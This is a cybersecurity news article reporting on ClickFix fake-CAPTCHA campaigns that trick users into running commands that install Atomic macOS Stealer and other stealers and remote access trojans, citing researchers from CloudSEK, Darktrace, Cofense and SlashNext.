Cybersecurity researchers are alerting to a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading an information stealer malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems.
The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum.
“macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” security researcher Koushik Pal said in a report published this week. “The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”
It’s believed that the activity is the work of Russian-speaking cybercriminals owing to the presence of Russian language comments in the malware’s source code.
The starting point of the attack is a web page that impersonates Spectrum (“panel-spectrum[.]net” or “spectrum-ticket[.]net”). Visitors to the sites in question are served a message that instructs them to complete a hCaptcha verification check to in order to “review the security” of their connection before proceeding further.
However, when the user clicks the “I am human” checkbox for evaluation, they are displayed an error message stating “CAPTCHA verification failed,” urging them to click a button to go ahead with an “Alternative Verification.”
Doing so causes a command to be copied to the users’ clipboard and the victim is shown a set of instructions depending on their operating system. While they are guided to run a PowerShell command on Windows by opening the Windows Run dialog, it’s substituted by a shell script that’s executed by launching the Terminal app on macOS.
The shell script, for its part, prompts users to enter their system password and downloads a next-stage payload, in this case, a known stealer called Atomic Stealer.
“Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure,” Pal said.
“The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction ‘Press & hold the Windows Key + R’ was displayed to both Windows and Mac users.”
The disclosure comes amid a surge in campaigns using the ClickFix tactic to deliver a wide range of malware families over the past year.
“Actors carrying out these targeted attacks typically utilize similar techniques, tools, and procedures (TTPs) to gain initial access,” Darktrace said. “These include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms, such as GitHub, to deliver malicious payloads.”
The links distributed using these vectors typically redirect the end user to a malicious URL that displays a fake CAPTCHA verification check in an attempt to deceive users into thinking that they are carrying out something innocuous, when, in reality, they are guided to execute malicious commands to fix a non-existent issue.
The end result of this effective social engineering method is that users end up compromising their own systems, enabling threat actors to bypass security controls.
The cybersecurity company said it identified multiple ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA), and in the United States. And these campaigns are gaining steam, adopting several variations but operating with the same end goal of delivering malicious payloads, ranging from trojans to stealers to ransomware.
Earlier this week, Cofense outlined an email phishing campaign that spoofs Booking.com, targeting hotel chains and the food services sector with fake CAPTCHAs that lead to XWorm RAT, PureLogs Stealer, and DanaBot. The fact that ClickFix is flexible and easy to adapt makes it an attractive malware distribution mechanism.
“While the exact email structure varies from sample to sample, these campaigns generally provide Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers,” Cofense said.
The email security firm said it has also observed ClickFix samples mimicking cookie consent banners, wherein clicking on the “Accept” button causes a malicious script file to be downloaded. The user is subsequently prompted to run the script to accept cookies.
In one April 2025 incident analyzed by Darktrace, unknown threat actors were found to utilize ClickFix as an attack vector to download nondescript payloads to burrow deeper into the target environment, conduct lateral movement, send system-related information to an external server via an HTTP POST request, and ultimately exfiltrate data.
“ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses,” Darktrace said. “By tricking endpoint users into performing seemingly harmless, everyday actions, attackers gain initial access to systems where they can access and exfiltrate sensitive data.”
Other ClickFix attacks have employed phony versions of other popular CAPTCHA services like Google reCAPTCHA and Cloudflare Turnstile for malware delivery under the guise of routine security checks.
These fake pages are “pixel-perfect copies” of their legitimate counterparts, sometimes even injected into real-but-hacked websites to trick unsuspecting users. Stealers such as Lumma and StealC, as well as full-fledged remote access trojans (RATs) like NetSupport RAT are some of the payloads distributed via bogus Turnstile pages.
“Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” SlashNext’s Daniel Kelley said. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.”
